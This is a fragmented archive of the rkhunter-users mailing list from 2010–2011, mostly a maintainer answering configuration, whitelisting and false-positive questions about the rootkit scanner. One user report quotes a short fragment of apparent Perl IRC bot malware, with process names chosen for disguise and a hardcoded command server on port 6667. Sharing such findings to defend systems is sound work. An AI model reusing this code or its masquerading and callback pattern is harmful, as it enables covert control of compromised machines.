ikipedia shows it on
>
> http://en.wikipedia.org/wiki/Rkhunter
>
Wow. Didn't know there was a wikipedia entry! :-) However it lists it as
the 'Old rkhunter web page'.
See the official web page at the bottom
On Tue, 2010-05-25 at 09:34 -0700, Duane Loftus wrote:
> OK, time for dumb questions.
>
> 1. John Horne says: It hasn't installed properly, try re-installing.
> The INSTALLDIR option must exist for RKH to run.
>
> Is there any guidance on re-installing?
>
Yes, look in
KH,
then send us the output of the installer.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
--
___
Rkhunter-users mailing lis
ackage manager option. FC6 won't be updated anymore, so all
the current package files should correspond to their entries in the RPM
database.
John.
--
John Horne Tel: +44 (0)1752 587287
University of Plymouth, UK Fax: +44 (0)1752 587001
' config
file ('/etc/rkhunter.conf.local'). This way when you next upgrade RKH,
you do not have to modify the newly installed rkhunter.conf as all your
settings will be in your local file.
John.
--
John Horne, University of Plymouth
alone, and
then run RKH. Then only modify those options which cause a warning,
everything else will be automatically detected.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587
es not need option 'Protocol' to be set?
>
No. From the config file:
...If the 'Protocol' option has not been set in the SSH
# configuration file, then a value of '2' may be set here in order to
# suppress a warning message.
So set it to '2
When RKH runs it will look at '/etc/rkhunter.conf', but will then look
at '/etc/rkhunter.conf.local' (if it exists) and override any previously
set options.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
-147 lib]# more random-seed
>
You can't list it (using 'more'), because it is a binary/data file not a
text file. See the 'file' command for help on that.
John.
--
John Horne, University of Plymouth, UK
Tel: +4
run 'rkhunter --update --propupd' as I said? If not, then do it
now.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
--
__
h '--propupd', then changed the config to use
the package manager ('PKGMGR=RPM'). This would then make your current
file properties report many warnings. If you change the config to use,
or not use, the package manager for checks, then you must run 'rkhunter
--propupd'
>
A default install will put the rkhunter command into /usr/local/bin. So
the full pathname should be '/usr/local/bin/rkhunter'.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
--
___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
t from lsmod, and found nothing
in /proc/modules.
For Fedora I would expect some modules to be loaded. However, if that is
how your system runs (possibly due to plesk?), then you can disable the
test. Copy the DISABLED_TESTS line from /etc/rkhunter.conf, and paste it
into /etc/rkhunter.conf.local.
bitch.
>
As far as I am aware rkhunter doesn't care whether a directory has the
setgid bit set or not. I would say, leave the above ALLOWHIDDENDIR
option in your config file, and reset the permissions on the directory.
John.
--
John Horne, Univers
isable the 'apps' test completely.
2) Whitelist each of the applications - for example:
APP_WHITELIST="httpd named openssl"
3) Install more up todate versions of the applications.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)
go by the colour of the test result. If it's not red then don't worry
about it. The skipped tests will be yellow simply to indicate that you
may want to install the re
red.
>
Run rkhunter ('rkhunter -c') directly from a terminal, physical console
or xterm.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
--
___
On Tue, 2010-06-01 at 22:33 +0100, Adam McGreggor wrote:
> On Sun, May 30, 2010 at 10:07:40PM +0100, John Horne wrote:
> > On Sun, 2010-05-30 at 21:27 +0100, Adam McGreggor wrote:
> > > I have a directory, /etc/.svn, which is setgid (2775/drwxrwsrx).
> > >
>
> 32-bit system. Any x86_64 /usr/lib64 probs should have been gone
> long time ago, our build process doesn't default to /usr/lib64
> (should be /usr/local anyway), so I'm looking for confirmation this
> is a RPMForge packager problem.
>
Hi,
Tee file will on its way
You could just set it to something like /var/tmp. However, I
think /dev/shm was used because it is memory-resident, and so less
intensive for the test.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
-
x27;t like the colon (:) characters.
Already fixed in the CVS version though.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
--
ThinkGeek and WIRED's GeekDad team up
Alternative is to use the current CVS version of rkhunter.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
--
ThinkGeek and WIRED's GeekDad team up for
w the servers CPU usage going up and
down regularly. In that respect I have gotten used to it, and the users
don't seem to notice it. Obviously if the usage stays high (or low!),
then it is investigated.
John.
--
John Horne, University of Ply
unning RKH with '--debug' might have indicated
why.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
--
This SF.net email is sponsored by Sprint
What will you d
ific files. (In your case it would be the 'hdparm' string
in the /etc/rc.d/rc.sysinit and bootlogd files. This means you don't
have to whitelist the files from all rootkit checks.)
At the moment you will have to whitelist the files
atever command you use to run rkhunter and add the
'--debug' option to it please. Then email me the resulting output file
in /tmp. Also can you email me the log file
(usually /var/log/rkhunter.log).
Thanks,
John.
of the
whitelisting options are allowed to be specified more than once.
I'll email you a drop-in corrected version of the 'rkhunter' program (it
will still be version 1.3.6), that will allow your configuration above.
It also contains the fix for the Mandriva 'rkhunter /b
looks as if the program ran. The 'lsmod'
command starts with a header line containing 'Module', and 'ipv6' and
'nf_conntrack_ipv4' are certainly module names.
What I would like to see is the rkhunter log file for this, or better
still output from a run when the
n email me the log file (/var/log/rkhunter.log). Thanks.
>
> I figure that maybe I need to run rkhunter --propupd
>
Nope, that's got nothing to do with it.
John.
--
John Horne Tel: +44 (0)1752 587287
University of Plymouth, UK Fax: +44 (0)1752 587001
-
un 'rkhunter --debug --version' and then email me (not the list)
the file that is created in /tmp (named rkhunter-debug...). It should
contain enough info to see what is going on.
John.
--
John Horne Tel: +44 (0)1752 587287
Univers
it does. If you really want to
specify exactly should be checked, and what shouldn't, then maybe
something like Aide or Tripwire would be more suitable.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
directories will be searched as well.
Option 'b' can be achieved by setting
USER_FILEPROP_FILES_DIRS="/usr/local/libexec", again other directories
will be searched.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
On Wed, 2010-08-11 at 16:25 -0700, Jonny Kent wrote:
>
>
>
> err maybe that is a new flag. where is USER_FILEPROP_FILES_DIRS
> documented? so I can't answer you fully.
>
Sorry, that was added in at version 1.3.6. Your original post said you
were running 1.3.4 I th
art). By
default it is not enabled, so you must have set USE_LOCKING=1 in the
config file.
To remove the lock file simply run:
rkhunter --unlock
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
-
On Wed, 2010-08-18 at 20:07 -0400, Mike Strickland wrote:
> On Wed, 2010-08-18 at 21:35 +0100, John Horne wrote:
> > This is rkhunter's locking mechanism to prevent 2 or more instances of
> > RKH running together (and so messing up the log file for a start). By
> > def
t is waiting for the lock, and show a count of the number of seconds
in increments of 10 seconds. It will wait a maximum of 300 seconds (5
mins), but that is configurable. After that time it gives up.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287
On Sat, 2010-08-21 at 16:30 -0700, Conrad Schuler wrote:
> In the rkhunter.conf file it says to burn the rkhunter.dat to a CD and
> link to it.
>
?? Where on earth does it say that?
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)17
7;system'.
>
The test is for complete files names, not partial matches - so
'.../system' matches, but '.../system_bus_socket' will not. Without
seeing the lsof output, which has obviously changed by now, it is
impossible to say what was matched.
The test has been improve
On Mon, 2010-09-13 at 02:59 +0300, Nerijus Baliunas wrote:
> On Thu, 09 Sep 2010 10:21:56 +0100 John Horne
> wrote:
>
> > The test is for complete files names, not partial matches - so
> > '.../system' matches, but '.../system_bus_socket' will not. With
On Mon, 2010-09-13 at 14:14 +0300, Nerijus Baliunas wrote:
> On Mon, 13 Sep 2010 11:56:03 +0100 John Horne
> wrote:
>
> > > I have similar problem with wine. When there are no wine apps running,
> > > I get no warning, but with wine running I get the warning.
> &g
)
Seen by sched_rr_get_interval()
# ps p 13864
PID TTY STAT TIME COMMAND
# unhide.rb|wc -l
3287
# unhide.rb|grep '^ Seen by ps'|wc -l
295
I only showed the last PID found, but as can be seen it says it has
found 295 suspicious PIDs.
J
On Thu, 2010-09-16 at 17:29 +0200, unsp...@hushmail.com wrote:
> Hello John,
>
> On Tue, 14 Sep 2010 15:59:39 +0200 John Horne
> wrote:
> >I seem to get quite a few FP's from this:
>
> Do those still occur after using Walles' fix posted on SF?
>
No, th
d for file '/usr/local/bin/perl' in the
> rkhunter.dat file.
>
What are the other values of USER_FILEPROP_FILES_DIRS you have
configured?
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)
hide sys" output is :
> "HIDDEN Processes Found: number_of_hidden_processes"
>
Thanks for reporting this. It has been fixed in the next release.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
rom the RKH config file:
# NOTE: Only files and directories which have been added by the user,
# and are not part of the internal lists, can be excluded. So, for
# example, it is not possible to exclude the 'ps' command by using
# '!/bin/ps'. These will be silently ignore
On Mon, 2010-09-13 at 14:14 +0300, Nerijus Baliunas wrote:
> On Mon, 13 Sep 2010 11:56:03 +0100 John Horne
> wrote:
>
> > > I have similar problem with wine. When there are no wine apps running,
> > > I get no warning, but with wine running I get the warning.
> &g
is whitelisted
>
> Am I missing anything? Do I have to whitelist apache2 with no specified
> file? Any suggestion?
>
What have you put into the RKH config file for this?
John.
--
John Horne, Universit
On Tue, 2010-09-28 at 10:26 +0200, William Maddler wrote:
> On 27/09/2010 23:47, John Horne wrote:
> > On Mon, 2010-09-27 at 12:53 +0200, William Maddler wrote:
> >> Hello,
> >> I keep getting a warning for apache2 using deleted files:
> >>
> >> [12:01
On Thu, 2010-10-21 at 13:05 +0200, Leon Waldman wrote:
>
> Can any one tell me if it's possible to pass individual
> filenames/paths to the propupd option?
>
Yes it is if you are running version 1.3.6. Look at the man page.
John.
--
John Horne, University of Plymouth, UK
27; letter, and not the same as the lowercase 'c' letter which is short
for the '--check' option. Using '-C' (or '--checkconfig') simply runs
through the configuration files and checks that they look okay, it then
exits. It will not display anything if all
s 'head -1 /var/lib/rkhunter/db/i18n/en' show?
John.
--
John Horne Tel: +44 (0)1752 587287
University of Plymouth, UK Fax: +44 (0)1752 587001
--
Nokia and AT&T present the 2010 C
that instance RKH looks in the config file to
see what tests are enabled, which by default is 'all'.
When running specific tests I tend to just use:
rkhunter --enable hidden_procs
That is all that is required. If more than one test is to run, then just
comma-separate them or use mult
On Tue, 2010-11-02 at 06:34 +0100, Patrick Gouin wrote:
> Le 01/11/2010 18:51, John Horne a écrit :
> > On Mon, 2010-11-01 at 17:02 +0100, Patrick Gouin wrote:
> >
> > Okay, but why does your path have a directory name with a trailing '/'?
> > I'
[ Found ]
> [20:21:27] Info: Found syslog configuration file: /etc/syslog.conf
>
> RKH should probably looks only for the config file corresponding to
> the syslog utility it found just before.
>
I don't quite follow this. Are you saying:
1) that /etc/syslog.conf is a symbol
unning?
> >
> >
> That's exactly what I mean except I would have written check instead of
> show..
>
Okay, I'll take a look and see if we can do something.
John.
--
John Horne, University of Plym
s, but I'll save them for a separate email and if I run
> into any further issues I'll be back.
>
Okay, thanks again.
One point, OS X does not have a /dev/shm directory, so if you want to
run 'suspscan', then I tend to use:
SUSPSCAN_TEMP=/var/lib/rkhunter/tmp
or wherever y
it is doing. We should probably add 'launchd' itself to the list of
monitored files for OS X as well (if we haven't already).
John.
--
John Horne Tel: +44 (0)1752 587287
University of Plymouth, UK Fax: +44 (0)1752 587001
-
ux/UNIX
exploit with Boonana, only OS X and MS Windows. As such, at the moment,
Boonana is only tested for on OS X.
Obviously, anyone with any Linux/UNIX details, then please let us
know :-)
John.
--
John Horne Tel: +44 (0)1752 587287
University of Plymouth, UK Fax
ver, OS X does not generally use the file. Passwords are
maintained in a database, and not the passwd file. As far as I could
gather the file *may* be used in some instances when sorting out
problems with the machine.
In that respect, it is not a full check of the user passwords, but may
well be bet
Hello,
If you have installed the new release of rkhunter (1.3.8), would you
ensure you run 'rkhunter --update' after installation please. One of
the data files had a small error in it which has now been corrected.
Thanks,
John.
--
John Horne Tel: +44 (0)1
uration option: Invalid directory found: ./
> >
> > Could you help me?
> >
The BINDIR option, if not set on the command-line or in the config file,
will use the root PATH variable. In this instance it seems the user has
a relative path in PATH, and that is what RKH is complaining abou
; Any ideas please?
>
I can't see anything obviously wrong. Can you run:
rkhunter --enable deleted_files --debug
and email me the debug file created in /tmp.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
--
On Sat, 2010-11-20 at 16:30 +, John Horne wrote:
> On Sat, 2010-11-20 at 14:17 +, Dick Gevers wrote:
> > Hi,
> >
> > 1.3.8 works fine for me. Thanks for the latest version!
> >
> > Except it says in the logs:
> >
> > [23:51:10] Info: Sta
ions of RKH. New versions were released to coincide with 1.3.8 being
released. As such users of 1.3.6 (and before) may well see results
different from previously if they have run 'rkhunter --update' bec
le hidden_ports" but in my case that gave me:
> "Info: Unable to find the 'unhide-tcp' command"
>
Exactly. If your system doesn't have the unhide-tcp command then the
check cannot run. It is disabled by default because most people won't
have that command in
R_FILEPROP_FILES_DIR option.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
--
Increase Visibility of Your 3D Game App & Earn a Chance To Win $500!
Tap into the
ss it's already known much longer, because i read an article about it,
> in a "hackin9"-magazine from 2004!
>
Ping now added into CVS version.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)17
tem will re-prelink the files, and
then the verification will pass. Alternatively, do as RKH suggests, run
the 'prelink' command on the files - or use 'prelink -a' - and that
should take care of it. Or you could disable prelinking completely of
course.
John.
--
Joh
ecause of the timestamp. The
only thing I can suggest is to do a comparison with the timestamps
removed. Something like:
cat rkhunter.log | cut -d' ' -f2- >/tmp/rkh1
cat rkhunter.log.old | cut -d' ' -f2- >/tmp/rkh2
diff rkh1 rkh2
It is not ideal, but usable.
summary).
>
You can combine options to get just the summary. Try using '-q
--summary'.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
--
Lotusphere 2011
Reg
s
>
> which is clearly conflicting.
>
No it's not. That is the 'hidden_ports' test.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
--
Lotusp
ly.
As far as I am aware RKH has no '--file' option.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
--
Gaining the trust of online customers is vital for the suc
On Mon, 2011-01-17 at 11:33 -0500, James R. Marcus wrote:
> Some of my machines are behind a strict firewall, is there a recommended
> single mirror for RKHunter updates?
>
rkhunter.sourceforge.net
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +4
sh/sshd_config most other OSes use?
>
Yes, OSX does use /etc/sshd_config. It will be necessary to add to the
users config file: RTKT_FILE_WHITELIST=/etc/sshd_config
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1
On Tue, 2011-01-25 at 12:18 -0500, d...@456ny.com wrote:
> appreciate the response.
>
> how do i attach the log.
> i cannot even locate the log file within osx
>
The log file path is by default /var/log/rkhunter.log
John.
--
John Horne, University of Plymouth, UK
Tel: +44
On Fri, 2011-02-04 at 11:24 +0100, Torfinn Ingolfsen wrote:
> Hello,
>
> I'm running rkhunter under FreeBSD. I have done so for many years.
> After upgrading to rkhunter version 1.3.8,
>
Did you run 'rkhunter --propupd' after upgrading?
John.
--
John Horne
On Fri, 2011-02-04 at 14:03 +0100, Torfinn Ingolfsen wrote:
> Hi,
>
> On Fri, Feb 4, 2011 at 12:36 PM, John Horne wrote:
> > On Fri, 2011-02-04 at 11:24 +0100, Torfinn Ingolfsen wrote:
> >> Hello,
> >>
> >> I'm running rkhunter under FreeBSD. I ha
On Fri, 2011-02-04 at 17:58 +0100, Torfinn Ingolfsen wrote:
> Hi,
>
>
> On Fri, Feb 4, 2011 at 2:58 PM, John Horne wrote:
> > Do you use the USER_FILEPROP_FILES_DIRS option at all in your config
> > file(s)? If so can you show me what they are.
>
> I use the confi
at the lists of filenames
as newline delimited, but that would then mean that users would have to
enter each file on a separate line in the config file (whereas at
present they can use space-separated lists).
In answer to Kevin, as far as I can tell it is not possible to include a
filenam
get their servers back up and
running then the link should work again.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
--
The modern datacenter depends on network connec
; -x","/usr/sbin/acpid","/usr/sbin/cron","[bash]");
> my $processo = $ps[rand scalar @ps];
>
> $servidor='marvimex.hacked.jp' unless $servidor;
> my $porta='6667
m (or md5, sha1) commands in
the root PATH. If they are not found, then rkhunter will use its own
sha1/md5 perl function but only if perl is available.
Can you run 'rkhunter --list perl' please. If it shows the Digest::MD5
and SHA1 modules installed, then can you check that the p
On Mon, 2011-02-28 at 01:22 +0100, Boris Cuber wrote:
> (Btw., md5sum _is_ in the root path)
>
Sorry, just noticed this bit. Look in the /var/log/rkhunter.log file and
ensure that the PATH used by RKH is what you expect it to be (and that
md5sum is in that path).
John.
--
John
mand I think). Yet on a
non-prelinked system the mtime and ctime are unchanged but the atime is.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
--
Free Software Dow
On Thu, 2011-04-21 at 16:25 +0200, Carlos Oliva wrote:
>
> I think a good add-on for rkhunter is inspect the MD5 of the packages,
>
Try the 'DPKG' package manager option in the config file.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax:
; root
> ===
>
> As a result, now have received notification by e-mail "warning" .
> I want to receive which is not "[ Warning ]" message, but "[ Bad ]" message.
>
> how to achieve this?
>
>
Generally you can't. The only way you could do th
. What bug?
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
--
WhatsUp Gold - Download Free Network Management Software
The most intuitive, comprehensive, and co
> to see. I have commented out each prior to each string in hope not to
> spread anything or cause any problems. They appear to be make or load
> with some international connotation
>
Does the rkhunter log file not say which file it is found in?
John.
--
John Horne, University of
27;t tried this version myself, but the
later versions offered more options which may provide more info.
http://www.unhide-forensics.info/?Download
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
---
n.
>
Hello,
Many thanks for this. The problem has already been fixed in the CVS
version of rkhunter.
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
--
vRange
give it a go and see if it fixes
the problem.
Thanks,
John.
--
John Horne, University of Plymouth, UK
Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001
--
Simplify data backup and recovery for your virtual environm
will still monitor
it for any future changes.
If the fix for the 'file' command is included in a subsequent Fedora
'rkhunter' package, and you install that (via yum), then you should
remove the config file option above and let the package manager revert
to monitoring the progra
ROP_FILES_DIRS="/usr/bin/mc68000 /usr/bin/mc68010 /usr/bin/mc68020
/usr/bin/mc68030 /usr/bin/mc68040 /usr/bin/m68k /usr/bin/sun2 /usr/bin/sun3
/usr/bin/sun3x /usr/bin/u370"
Then run 'rkhunter --propupd'.
John.
--
John Horne Tel: +44 (0)1752 587287
University of
g ]
> /usr/ucb/file[ Warning ]
>
You will need to look in the log file (/var/log/rkhunter.log) to see why
these warnings occur.
John.
--
John Horne Tel: +44 (0)1752 587287
University of Plymouth, UK Fax: +44 (0)1752 587001
---
lo,
Yes, the SCRIPTWHITELIST option will whitelist commands which are
scripts so use the lines above (they are included in the rkhunter.conf
file just as examples).
John.
--
John Horne Tel: +44 (0)1752 587287
University
[ Warning ]
> [08:05:51] Warning: The file properties have changed:
> myhost : Mon Jun 27, 08:17:25 : ~
> #
>
> Anyone got any idea what could be causing this?
>
Hello,
What version of rkhunter are you using? Also can you show us the full
log entry for one of the files
On Mon, 2011-06-27 at 12:40 -0400, Tanstaafl wrote:
> Thanks for the help John...
>
> On 2011-06-27 10:57 AM, John Horne wrote:
> > What version of rkhunter are you using?
>
> 1.3.8
>
> > Also can you show us the full log entry for one of the files with a
> &
On Tue, 2011-06-28 at 10:54 -0400, Tanstaafl wrote:
> On 2011-06-27 5:24 PM, John Horne wrote:
> > The stored time is the modification time on the file when '--propupd'
> > was last used, not the time when '--propupd' was run.
>
> Ok, I guess I'm ju
On Tue, 2011-06-28 at 14:26 -0400, Tanstaafl wrote:
> On 2011-06-28 1:27 PM, John Horne wrote:
> > When you run 'rkhunter --propupd' it creates a local database of the
> > files to be monitored and records the modification date/time of each
> > file. That date/time
501 - 600 of 926 matches
Mail list logo